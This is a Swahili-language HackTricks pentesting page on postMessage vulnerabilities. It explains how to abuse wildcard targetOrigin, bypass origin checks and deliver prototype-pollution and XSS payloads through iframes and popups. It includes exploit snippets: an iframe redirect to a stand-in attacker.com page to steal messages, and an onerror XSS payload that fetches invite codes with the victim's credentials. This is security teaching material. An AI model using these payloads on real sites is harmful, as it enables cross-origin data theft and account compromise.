hacktricks/pentesting-web/postmessage-vulnerabilities/README.md

15 KiB
Raw Blame History

Mapungufu ya PostMessage

Mapungufu ya PostMessage

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na malware za kuiba.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

{% embed url="https://whiteintel.io" %}


Tuma Ujumbe wa PostMessage

PostMessage hutumia kazi ifuatayo kutuma ujumbe:

targetWindow.postMessage(message, targetOrigin, [transfer]);

# postMessage to current page
window.postMessage('{"__proto__":{"isAdmin":True}}', '*')

# postMessage to an iframe with id "idframe"
<iframe id="idframe" src="http://victim.com/"></iframe>
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')

# postMessage to an iframe via onload
<iframe src="https://victim.com/" onload="this.contentWindow.postMessage('<script>print()</script>','*')">

# postMessage to popup
win = open('URL', 'hack', 'width=800,height=300,top=500');
win.postMessage('{"__proto__":{"isAdmin":True}}', '*')

# postMessage to an URL
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')

# postMessage to iframe inside popup
win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
## loop until win.length == 1 (until the iframe is loaded)
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')

Tafadhali kumbuka kwamba targetOrigin inaweza kuwa '*' au URL kama https://company.com.
Katika skenario ya pili, ujumbe unaweza kutumwa kwa kikoa hicho tu (hata kama asili ya kitu cha dirisha ni tofauti).
Ikiwa alama ya joker inatumika, ujumbe unaweza kutumwa kwa kikoa chochote, na utatumwa kwa asili ya kitu cha Dirisha.

Kuvamia iframe & alama ya joker katika targetOrigin

Kama ilivyoelezwa katika ripoti hii ikiwa utapata ukurasa ambao unaweza kuingizwa kwenye iframe (bila ulinzi wa X-Frame-Header) na unatuma ujumbe wa hisia kupitia postMessage ukitumia alama ya joker (*), unaweza kubadilisha asili ya iframe na kuvuja ujumbe wa hisia kwenda kwa kikoa kinachodhibitiwa na wewe.
Tafadhali kumbuka kwamba ikiwa ukurasa unaweza kuingizwa kwenye iframe lakini targetOrigin imewekwa kwa URL na sio kwa alama ya joker, hila hii haitafanya kazi.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
setTimeout(exp, 6000); //Wait 6s

//Try to change the origin of the iframe each 100ms
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
}, 100);
}
</script>

Utekaji wa addEventListener

addEventListener ndio kazi hutumiwa na JS kutangaza kazi inayotarajia kupokea postMessages.
Msimbo kama ufuatao utatumika:

window.addEventListener("message", (event) => {
if (event.origin !== "http://example.org:8080")
return;

// ...
}, false);

Katika kesi hii, jambo la kwanza ambalo msimbo unafanya ni kuangalia asili. Hii ni muhimu sana hasa ikiwa ukurasa utafanya kitu nyeti na habari iliyopokelewa (kama kubadilisha nenosiri). Ikiwa haitoiangalia asili, wachomaji wanaweza kufanya waathiriwa watume data ya kupangwa kwa hii maeneo na kubadilisha nywila za waathiriwa (katika mfano huu).

Uchambuzi

Kwa lengo la kupata wasikilizaji wa tukio kwenye ukurasa wa sasa unaweza:

  • Tafuta msimbo wa JS kwa window.addEventListener na $(window).on (toleo la JQuery)
  • Tekeleza kwenye konsoli ya zana ya developer: getEventListeners(window)

  • Nenda Elements --> Wasikilizaji wa Tukio katika zana za developer ya kivinjari

Pita kwenye ukaguzi wa Asili

  • Sifa ya event.isTrusted inachukuliwa kuwa salama kwani inarudisha True tu kwa matukio yaliyozalishwa na vitendo halisi vya mtumiaji. Ingawa ni changamoto kuihepa ikiwa imefanywa kwa usahihi, umuhimu wake katika ukaguzi wa usalama ni muhimu.
  • Matumizi ya indexOf() kwa ukaguzi wa asili katika matukio ya PostMessage yanaweza kuwa rahisi kuihepa. Mfano unaoonyesha udhaifu huu ni:
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
  • Mbinu ya search() kutoka String.prototype.search() inalenga katika taratibu za kawaida, sio maneno. Kupitisha kitu kingine isipokuwa taratibu za kawaida kunapelekea uongofu wa lazima kuwa taratibu za kawaida, hivyo kufanya mbinu kuwa na hatari. Hii ni kwa sababu katika taratibu za kawaida, kipande (.) hufanya kama kichujio, kuruhusu kuihepa uthibitisho na uwanja ulioandaliwa kwa makini. Kwa mfano:
"https://www.safedomain.com".search("www.s.fedomain.com")
  • Kazi ya match(), kama search(), inashughulikia taratibu za kawaida. Ikiwa taratibu za kawaida hazijajengwa kwa usahihi, inaweza kuwa rahisi kuihepa.

  • Kazi ya escapeHtml inalenga kusafisha vipande kwa kutoroka wahusika. Hata hivyo, haifanyi kitu kipya cha kutoroka bali inabadilisha mali za kitu kilichopo. Tabia hii inaweza kutumika vibaya. Hasa, ikiwa kitu kinaweza kubadilishwa ili mali yake iliyodhibitiwa isikubali hasOwnProperty, escapeHtml haitafanya kama ilivyotarajiwa. Hii inaonyeshwa katika mifano hapa chini:

  • Kukosekana kwa Matarajio:

result = u({
message: "'\"<b>\\"
});
result.message // "&#39;&quot;&lt;b&gt;\"
  • Kuihepa kwa kutoroka:
result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"

Katika muktadha wa udhaifu huu, kitu cha File kinafaa kutumiwa kwa sababu ya mali yake ya kusoma tu ya name. Mali hii, inapotumiwa katika templeti, haifanyi safishwa na kazi ya escapeHtml, ikiongoza kwa hatari za usalama.

  • Mali ya document.domain katika JavaScript inaweza kuwekwa na skripti ili kupunguza kikoa, kuruhusu utekelezaji wa sera sawa ya asili ndani ya kikoa kimoja cha mzazi.

Kuihepa e.origin == window.origin

Wakati wa kuingiza ukurasa wa wavuti ndani ya sandboxed iframe kwa kutumia %%%%%%, ni muhimu kuelewa kuwa asili ya iframe itawekwa kwa null. Hii ni muhimu hasa unaposhughulika na vipengele vya sandbox na matokeo yake kwa usalama na utendaji.

Kwa kufafanua allow-popups katika kipengele cha sandbox, dirisha lolote la popup lililofunguliwa kutoka ndani ya iframe linarithi vikwazo vya sandbox ya mzazi wake. Hii inamaanisha kwamba isipokuwa allow-popups-to-escape-sandbox pia imejumuishwa, asili ya dirisha la popup pia inawekwa kwa null, ikilinganisha na asili ya iframe.

Kufuatia hivyo, wakati popup inapofunguliwa chini ya hali hizi na ujumbe unatumwa kutoka kwa iframe kwenda kwa popup kwa kutumia postMessage, pande zote za kutuma na kupokea zina asili zao zimewekwa kwa null. Hali hii inapelekea kwa hali ambapo e.origin == window.origin inathibitisha kuwa kweli (null == null), kwa sababu iframe na popup zote zina thamani sawa ya asili ya null.

Kwa habari zaidi soma:

{% content-ref url="bypassing-sop-with-iframes-1.md" %} bypassing-sop-with-iframes-1.md {% endcontent-ref %}

Kuihepa e.source

Inawezekana kuchunguza ikiwa ujumbe umetoka kwenye dirisha sawa ambalo skripti inasikiliza (hasa ya kuvutia kwa Vifaa vya Skripti za Yaliyomo kutoka kwa vifaa vya kivinjari ili kuhakikisha ikiwa ujumbe ulitumwa kutoka kwenye ukurasa sawa):

// If its not, return immediately.
if( received_message.source !== window ) {
return;
}

Unaweza kulazimisha e.source ya ujumbe kuwa null kwa kuunda iframe ambayo inatuma postMessage na kufutwa mara moja.

Kwa maelezo zaidi soma:

{% content-ref url="bypassing-sop-with-iframes-2.md" %} bypassing-sop-with-iframes-2.md {% endcontent-ref %}

Kizuizi cha Kichwa cha X-Frame

Ili kutekeleza mashambulizi haya kwa ufanisi, unaweza kuweka ukurasa wa mwathiriwa ndani ya iframe. Lakini baadhi ya vichwa kama X-Frame-Header vinaweza kuzuia hilo.
Katika hali hizo, bado unaweza kutumia shambulizi lisilo la siri. Unaweza kufungua kichupo kipya kwa programu-jalizi ya wavuti yenye kasoro na kuwasiliana nayo:

<script>
var w=window.open("<url>")
setTimeout(function(){w.postMessage('text here','*');}, 2000);
</script>

Kuiba ujumbe uliotumwa kwa mtoto kwa kuzuia ukurasa kuu

Katika ukurasa ufuatao unaweza kuona jinsi unavyoweza kuiba data nyeti ya postmessage iliyotumwa kwa iframe ya mtoto kwa kuzuia ukurasa mkuu kabla ya kutuma data na kutumia XSS katika mtoto kwa kuvuja kwa data kabla haijapokelewa:

{% content-ref url="blocking-main-page-to-steal-postmessage.md" %} blocking-main-page-to-steal-postmessage.md {% endcontent-ref %}

Kuiba ujumbe kwa kubadilisha mahali pa iframe

Ikiwa unaweza kuweka iframe kwenye ukurasa bila Kichwa cha X-Frame kinachohitajika ambacho kina iframe nyingine, unaweza kubadilisha mahali pa ile iframe ya mtoto, hivyo ikiwa inapokea postmessage iliyotumwa kwa alama ya joker, mshambuliaji anaweza kubadilisha asili ya iframe hiyo kwenda kwenye ukurasa unaodhibitiwa na yeye na kuiba ujumbe huo:

{% content-ref url="steal-postmessage-modifying-iframe-location.md" %} steal-postmessage-modifying-iframe-location.md {% endcontent-ref %}

postMessage kwa Uchafuzi wa Prototype na/au XSS

Katika mazingira ambapo data inayotumwa kupitia postMessage inatekelezwa na JS, unaweza kuweka iframe kwenye ukurasa na kutumia uchafuzi wa prototype/XSS kutuma uchafuzi kupitia postMessage.

Mifano ya XSS iliyoelezwa vizuri sana kupitia postMessage inaweza kupatikana katika https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html

Mfano wa uchafuzi wa kutumia Uchafuzi wa Prototype na kisha XSS kupitia postMessage kwa iframe:

<html>
<body>
<iframe id="idframe" src="http://127.0.0.1:21501/snippets/demo-3/embed"></iframe>
<script>
function get_code() {
document.getElementById('iframe_victim').contentWindow.postMessage('{"__proto__":{"editedbymod":{"username":"<img src=x onerror=\\\"fetch(\'http://127.0.0.1:21501/api/invitecodes\', {credentials: \'same-origin\'}).then(response => response.json()).then(data => {alert(data[\'result\'][0][\'code\']);})\\\" />"}}}','*');
document.getElementById('iframe_victim').contentWindow.postMessage(JSON.stringify("refresh"), '*');
}

setTimeout(get_code, 2000);
</script>
</body>
</html>

Kwa maelezo zaidi:

Marejeo

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za kuiba.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

{% embed url="https://whiteintel.io" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: